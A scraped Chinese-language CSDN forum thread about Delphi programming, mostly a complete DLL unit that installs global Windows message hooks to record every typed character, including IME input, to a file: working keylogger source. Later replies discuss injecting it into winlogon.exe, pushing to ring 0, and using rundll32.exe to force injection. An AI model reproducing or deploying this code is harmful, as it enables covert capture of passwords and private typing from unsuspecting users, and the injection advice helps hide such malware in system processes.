http://topic.csdn.net/u/20080626/21/04e44567-e092-4fa8-8737-84fdb8763530.html
或者先看看能不能解决.
或者先看看能不能解决.
解决方案 »
- item(i).innertext 取不到值!
- [请教] 如何把一台服务器上的数据表导入到另一台服务器中的同名数据表呢? 用DELPHI怎么实现?
- 撞墙的问题!!!!!!!!!!!!!!!!!!!!!!!!!!有答就有分
- 高手救我!为什么提示不能重复打开DATABASE?
- 安裝報表組件
- Delphi的函数在编译时是否能实现VC中Inline的效果?
- 我可以在Report显示或打印之前向ADO传递连接参数吗?
- 哪位大大帮我看看ADOQuery语句哪里写错了??
- delphi xe6 开发手机程序如何自适应各种不同屏幕大小的手机
- 如何在delphi中调用诸如“电脑播音员”这样的应用程序?
- ICS不能触发数据接受了 。。
- 急..多线程访问外部变量..在线等
看样子似乎是键盘钩子的问题,你把键盘钩子的代码写详细点试试unit UnitGetkeyDll;interfaceuses
windows,
messages,dialogs,forms,
sysutils,UnitConst; procedure InstallGetkey; stdcall;
procedure RemoveGetkey; stdcall;implementationvar
MemFile: THandle;
pShMem: PGetkeyMem;
HHCallWndProc,HHGetMsgProc: HHook;procedure SaveInfo(str: string); stdcall;
var
f: textfile;
begin
{保存为文件信息}
assignfile(f, FileName);
if fileexists(FileName) = false then rewrite(f)
else append(f);
if strcomp(pchar(str), pchar('#13#10')) = 0 then writeln(f, '')
else write(f, str);
closefile(f);
end;procedure HookProc(hWnd: integer; uMessage: integer; wParam: WPARAM; lParam: LPARAM); stdcall;
begin
if (uMessage = WM_CHAR) and (lParam <> 1) then
begin
SaveInfo(format('%s', [chr(wparam and $FF)]));
inc(pShMem^.count);
if pShMem^.count > 60 then
begin
SaveInfo('#13#10');
pShMem^.count := 0;
end;
end;
if (uMessage = WM_IME_CHAR) then
begin
SaveInfo(format('%s%s', [chr((wparam shr 8) and $FF), chr(wparam and $FF)]));
inc(pShMem^.count, 2);
end;
end;function GetMsgProc(nCode: integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
var
pcs: PMSG;
begin
pcs := PMSG(lParam);
if (nCode >= 0) and (wParam=PM_REMOVE)and (pcs <> nil) and (pcs^.hwnd <> 0) then
begin
HookProc(pcs^.hwnd, pcs^.message, pcs^.wParam, pcs^.lParam);
end;
Result := CallNextHookEx(HHGetMsgProc, nCode, wParam, lParam);
end;function CallWndProc(nCode: integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
var
pcs: PCWPSTRUCT;
begin
pcs := PCWPSTRUCT(lParam);
if (nCode >= 0) and (pcs <> nil) and (pcs^.hwnd <> 0) then
begin
HookProc(pcs^.hwnd, pcs^.message, pcs^.wParam, pcs^.lParam);
end;
Result := CallNextHookEx(HHCallWndProc, nCode, wParam, lParam);
end;procedure Intro;
begin
MemFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TGetKeyMem), MemNameGetkey);
pShMem := MapViewOfFile(MemFile, FILE_MAP_WRITE or FILE_MAP_READ, 0, 0, 0);
end;procedure Extro;
begin
if pShMem<>nil then
begin
UnmapViewOfFile(pShMem);
pShMem:=nil;
end;
if memfile<>0 then
begin
CloseHandle(MemFile);
MemFile:=0;
end;
end;procedure RemoveGetkey;
begin
if HHGetMsgProc <> 0 then UnhookWindowsHookEx(HHGetMsgProc);
HHGetMsgProc := 0;
if HHCallWndProc <> 0 then UnhookWindowsHookEx(HHCallWndProc);
HHCallWndProc := 0;
end;procedure InstallGetKey; stdcall;
var
p: PInstallMem;
h: THandle;
begin
pShMem^.Count:=0;
pShMem^.LibHandle:=hInstance;
if HHGetMsgProc = 0 then
HHGetMsgProc := SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, hinstance, 0);
if HHCallWndProc = 0 then
HHCallWndProc := SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, hinstance, 0);
h:=OpenFileMapping(FILE_MAP_WRITE or FILE_MAP_READ, false, MemNameInstall);
if h<>0 then
begin
p:=MapViewOfFile(h,FILE_MAP_READ,0,0,0);
if p<>nil then
begin
postmessage(p^.MainFormHandle, wm_user, 1, 1);
UnmapViewofFile(p);
end;
closeHandle(h);
end;
pShMem^.ExitIt:=false;
while not pShMem^.ExitIt do application.ProcessMessages;
ExitThread(0);
end;initialization
Intro;
finalization
Extro;end.
看这样有没有问题
没法子了……
试着换个进程注入看看……
比如winlogon.exe……
没那么好注入
ring 0的。
int到ring0去,就不信注不进去……
对了,DLL注入一般是调用rundll32.exe的,如果进程弄错了也有可能出现问题……
……好像我的rundll32.exe也被注入了,下去手杀……